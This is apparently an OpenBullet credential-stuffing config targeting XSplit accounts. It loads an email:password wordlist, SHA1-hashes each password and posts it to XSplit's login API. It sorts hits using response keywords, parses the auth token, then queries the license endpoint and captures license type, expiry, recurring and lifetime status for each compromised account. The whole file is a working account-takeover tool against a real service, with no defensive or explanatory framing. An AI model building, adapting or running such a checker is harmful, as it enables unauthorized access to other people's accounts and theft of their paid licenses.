[SETTINGS]
{
  "Name": "XSplit",
  "SuggestedBots": 10,
  "LastModified": "2018-12-30T21:01:59.1268951+01:00",
  "AdditionalInfo": "",
  "Author": "YungChef",
  "Version": "1.0.0",
  "NeedsProxies": false,
  "OnlySocks": false,
  "OnlySsl": false,
  "MaxProxyUses": 0,
  "AllowedWordlist1": "MailPass",
  "AllowedWordlist2": "None",
  "DataRules": [],
  "CustomInputs": [],
  "ForceHeadless": false,
  "AlwaysOpen": false,
  "AlwaysQuit": false,
  "DisableNotifications": false,
  "CustomUserAgent": "",
  "RandomUA": false,
  "CustomCMDArgs": ""
}
[SCRIPT]
#SHA1_PASS FUNCTION Hash SHA1 "<PASS>" -> VAR "SHA1pass" 
#POST REQUEST POST "https://www.xsplit.com/serviceapi/2/auth/credentials" AutoRedirect=TRUE 
  CONTENT "{\"email\":\"<USER>\",\"password\":\"<SHA1pass>\",\"cookie\":false}" 
  CONTENTTYPE "application/vnd.api+json" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: www.xsplit.com" 
  HEADER "Origin: https://www.xsplit.com" 
  HEADER "X-Machine-Id: " 
  HEADER "Session-Id: aaace203-c63e-4284-91a3-0eb6f127d924" 
  HEADER "Client-Variant: grav" 
  HEADER "XSplitCoreVersion: S5.93037794eecffb13043aad972c63c2819baafc57" 
  HEADER "XSplitClientName: XSplitWebsite" 
  HEADER "X-XSplit-InstallerFile: " 
  HEADER "DNT: 1" 
  HEADER "Referer: https://www.xsplit.com/buy?pp=WWW_NAVBAR" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=FALSE 
  KEYCHAIN Failure OR 
    KEY "E-mail\/Email Address is invalid" 
    KEY "Password is invalid" 
    KEY "Unauthorized" 
  KEYCHAIN Success OR 
    KEY "authtoken\":\"" 
    KEY "token\":\"" 
#TOKEN_PARSE PARSE "<SOURCE>" JSON "token" Recursive=FALSE -> VAR "token" "" "" 
#REDIRECT REQUEST POST "https://www.xsplit.com/serviceapi/2/license/current" AutoRedirect=TRUE 
  CONTENT "{}" 
  CONTENTTYPE "application/vnd.api+json" 
  HEADER "Accept: application/json, text/plain, */*" 
  HEADER "User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/65.0.3325.181 Safari/537.36" 
  HEADER "Pragma: no-cache" 
  HEADER "Host: www.xsplit.com" 
  HEADER "Origin: https://www.xsplit.com" 
  HEADER "X-Machine-Id: " 
  HEADER "Session-Id: aaace203-c63e-4284-91a3-0eb6f127d924" 
  HEADER "Client-Variant: grav" 
  HEADER "XSplitCoreVersion: S5.93037794eecffb13043aad972c63c2819baafc57" 
  HEADER "XSplitClientName: XSplitWebsite" 
  HEADER "X-XSplit-InstallerFile: " 
  HEADER "DNT: 1" 
  HEADER "Referer: https://www.xsplit.com/" 
#license PARSE "<SOURCE>" LR "attributes\":{\"type\":\"xsplit\",\"license\":\"" "\"" Recursive=FALSE -> CAP "license" "" "" 
#valid_until PARSE "<SOURCE>" LR "\",\"end\":\"" "\"" Recursive=FALSE -> CAP "Valid Until" "" "" 
#is_recurring PARSE "<SOURCE>" LR "\",\"is_recurring\":" "," Recursive=FALSE -> CAP "is_recurring" "" "" 
#is_lifetime PARSE "<SOURCE>" LR ",\"is_lifetime\":" "}}" Recursive=FALSE -> CAP "is_lifetime" "" "" 
KEYCHECK BanOn4XX=FALSE BanOnToCheck=TRUE 
  KEYCHAIN CUSTOM "FREE" OR 
    KEY "attributes\":{\"type\":\"xsplit\",\"license\":\"XSplitFree" 
